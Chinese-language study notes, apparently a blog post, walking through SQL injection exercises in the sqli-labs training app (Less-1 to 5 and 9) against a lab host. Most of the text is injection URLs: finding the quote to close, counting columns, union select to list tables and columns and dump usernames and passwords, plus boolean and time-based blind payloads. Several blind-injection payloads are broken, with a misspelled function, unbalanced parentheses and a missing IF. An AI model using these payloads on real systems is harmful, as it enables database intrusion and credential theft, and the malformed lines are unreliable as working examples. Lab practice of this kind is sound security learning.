Sql注入基础

sql注入前置理解

bash 复制代码
在这里插入代码片select * from users where id = $id ---- 数字型注入----select * from users where id = 1 or 1=1---搞定

select * from users where id = 'id' ---- 字符型注入----select * from users where id = '1 or 1=1'---可以,一个整体都是id的值,有warning是它的容错,所以需要闭合标点符号 

mysql的注释是--空格或者#号

get传参存在url编码,防止空格被编码,+会被注释为空格,所以--+

闭合符有(),',",(())等

Less-1:

1.sql注入类型。先当作数字型处理,出不来数据,and起作用了。如果能出来数据,闭合符里面为---1 and 1=2---,说明是字符型

复制代码
MariaDB [security]> select * from security.users where id =1 and 1=2 --+;
http://172.25.254.184/sqli/Less-1/?id=1 and 1=2 --+

2.判断闭合符。用and的逻辑判断闭合符,所以闭合符为'

复制代码
MariaDB [security]> select * from security.users where id ='1' and 1=2 --+';
http://172.25.254.184/sqli/Less-1/?id=1' and 1=2 --+

3.查询查询的列数(order by | group by),用union实现联合注入。判断是3列

复制代码
http://172.25.254.184/sqli/Less-1/?id=1' order by 4 --+

4.判断回显的位置。在2和3的位置,再这里写sql语句

复制代码
http://172.25.254.184/sqli/Less-1/?id=-1' union select 1,2,3 --+

5.获取表名

复制代码
MariaDB [information_schema]> select group_concat(table_name) from information_schema.tables where table_schema='security';
http://172.25.254.184/sqli/Less-1/?id=-1' union select 1,(select database()),group_concat(table_name) from information_schema.tables where table_schema='security' --+

6.获取列名---列出所有用group_concat或者limit

复制代码
MariaDB [security]> select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users';
http://172.25.254.184/sqli/Less-1/?id=-1' union select 1,(select database()),group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'; --+

7.查数据

复制代码
MariaDB [security]> select group_concat(username,'~',password) from security.users;
http://172.25.254.184/sqli/Less-1/?id=-1' union select 1,(select database()),group_concat(username,'~',password) from security.users --+

8.截取

复制代码
MariaDB [security]> select substr(group_concat(username,'~',password),1,32) from security.users;
http://172.25.254.184/sqli/Less-1/?id=-1' union select 1,(select database()),substr(group_concat(username,'~',password),1,32) from security.users --+

Less-2

第一步:判断--是数字型

复制代码
http://172.25.254.1/sqli/Less-2/?id=1 and 1=2 --+

第二步:判断--列数---3列数据

复制代码
http://172.25.254.1/sqli/Less-2/?id=1 order by 4 --+

第三步:判断回显位置---在2,3的位置

复制代码
http://172.25.254.1/sqli/Less-2/?id=-1 union select 1,2,3 --+

Less-3

第一步:判断--是字符型

复制代码
http://172.25.254.1/sqli/Less-3/?id=1 and 1=2 --+

第二步:判断闭合符---')

复制代码
http://172.25.254.1/sqli/Less-3/?id=1') and 1=2 --+

第三步:判断列数--四列

复制代码
http://172.25.254.184/sqli/Less-3/?id=1') order by 4 --+

第四步:判断回显位置

复制代码
http://172.25.254.184/sqli/Less-3/?id=-1') union select 1,2,3 --+

Less-4--")

第一步:判断--是字符型

复制代码
http://172.25.254.1/sqli/Less-4/?id=1 and 1=2 --+

第二步:判断闭合符---")

复制代码
http://172.25.254.184/sqli/Less-4/?id=1") and 1=2 --+

第三步:判断列数--四列

复制代码
http://172.25.254.184/sqli/Less-4/?id=1") order by 4 --+

第四步:判断回显位置

复制代码
http://172.25.254.184/sqli/Less-4/?id=-1") union select 1,2,3 --+

Less-5--布尔盲注--只有true和false

复制代码
http://172.25.254.1/sqli/Less-5/?id=1 and length(database())=8 --+

ascii加二分定位每一个字符

复制代码
http://172.25.254.1/sqli/Less-5/?id=1 and ascii(aubstr(database(),1,1)<125 --+

Less-9---时间盲注

IF(条件,成功返回,失败返回)--字符型

复制代码
http://172.25.254.1/sqli/Less-9/?id=1' sleep(3) --+

http://172.25.254.1/sqli/Less-9/?id=1' and (length(database())>3,sleep(3),0) --+

http://172.25.254.1/sqli/Less-9/?id=1' and (substr(database(),1,1)="s",sleep(3),0) --+
相关推荐
Fnetlink16 小时前
Fnet 云网安 260904
网络·人工智能·安全·web安全·网络安全
Mr.朱鹏7 小时前
Linux 服务器 LVM 根分区在线动态扩容
linux·服务器·数据库
摇滚侠7 小时前
《SpringBoot 3:入门与应用实战》第 12 章 JDBC 与事务 数据库初始化机制 阅读笔记 36
数据库·spring boot·笔记
qiuhaipeng17 小时前
Claude code 升级后上下文长度变短问题
java·前端·数据库
志栋智能7 小时前
安全超自动化如何支持大规模安全运营?
网络·安全·自动化
安科瑞黄益鸣8 小时前
筑牢高压直流安全防线:AIM‑T500L 绝缘监测仪在算力中心 DC800V 系统的应用
安全
HugoStudio_SWAN8 小时前
洛谷 B4500 / B4449 / B3843 凯撒密码、密码强度与密码合规——加密与安全的三道门
c++·学习·程序人生·算法·安全
wxwx_bscxy3228 小时前
基于Python新冠疫情可视化分析系统的设计与实现
java·数据库·spring boot·python·微信小程序·sqlite
小五传输8 小时前
FTP替代怎么做?医院文件安全传输选型与迁移指南
大数据·运维·安全
TechWayfarer9 小时前
Cloudflare 9·15新政倒计时:用IP风险画像识别AI爬虫,防止误伤Googlebot
网络·人工智能·爬虫·python·tcp/ip·网络安全